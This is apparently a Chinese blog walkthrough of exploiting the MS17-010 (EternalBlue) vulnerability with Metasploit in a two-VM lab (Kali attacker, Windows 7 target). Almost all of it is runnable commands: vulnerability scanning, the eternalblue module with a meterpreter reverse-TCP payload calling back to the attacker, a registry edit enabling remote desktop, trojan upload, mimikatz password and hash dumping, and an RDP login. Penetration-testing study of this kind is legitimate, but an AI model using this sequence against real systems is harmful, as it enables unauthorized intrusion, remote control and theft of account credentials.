MSF之MS17-010永恒之蓝漏洞利用

  1. 准备阶段
  2. 扫描漏洞
  3. 漏洞攻击

准备阶段

实验准备环境:

攻击机:虚拟机kali系统 IP:192.168.207.130

被攻击机:虚拟机Win7x64系统 IP:10.101.2.11 (关闭了防火墙)

攻击工具:kali自带MsfConsole工具


扫描漏洞

在kali终端内输入:msfconsole

msf >use auxiliary/scanner/smb/smb_ms17_010 (加载扫描exp)
msf >set RHOSTS 10.101.2.11         (设置被扫描IP)
msf >run                    (进行扫描,观察是否存在该漏洞)

由上图可知,该被攻击机存在MS17-010漏洞


漏洞攻击

use exploit/windows/smb/ms17_010_eternalblue        (加载攻击模块)
set RHOST 10.101.2.11                   (被攻击机IP)
set LHOST 192.168.207.130               (设置本地IP)
set LPORT 4444                      (设置连接端口)
set payload windows/x64/meterpreter/reverse_tcp     (配置回链方式)

配置信息

show options                        (查看配置相关信息)

meterpreter >exploit                    (开始攻击)

攻击成功!

sysinfo                         (爆出系统信息)
screenshot                      (截屏,截屏后的图片存放在/root/中)
meterpreter >shell                  (进入靶机cmd)

此时,可以新建文件夹,然后

meterpreter >upload植入已经写好的木马!<此中方法,以后再做>

也可以通过使用msf中的 mimikatz,来爆出靶机的用户名和密码,以下是其过程

首先

netstat -an         <查看靶机端口占用情况>

如果没有开启3389端口,可以使用以下命令在cmd中开启

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

其次

meterpreter > load mimikatz
meterpreter > help

meterpreter > msv   <获取的是hash值>

meterpreter > ssp   <获取的是明文信息>

meterpreter > wdigest   <读取内存中存放的账号密码明文信息>

meterpreter > kerberos  <同widgest类似,我也没有弄清楚,如果大佬知道,还望指点>

接下来,就是远程登录靶机!

rdesktop 10.101.2.11

成功!

最后修改:2020 年 09 月 19 日
如果觉得我的文章对你有用,请随意赞赏~